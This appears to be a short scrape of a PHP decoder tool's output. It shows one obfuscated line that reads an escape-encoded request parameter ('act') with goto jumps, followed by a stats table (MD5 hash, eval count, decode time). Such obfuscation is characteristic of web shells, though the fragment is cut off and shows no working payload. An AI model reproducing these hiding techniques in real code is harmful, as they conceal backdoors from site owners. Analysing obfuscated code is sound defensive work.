$_GET["\141\x63\x74"]; goto OwdS2; IEiE7: ?>Function Calls
| None |
Stats
| MD5 | ec59458c46feda2eb8f9be0eac4d973c |
| Eval Count | 0 |
| Decode Time | 122 ms |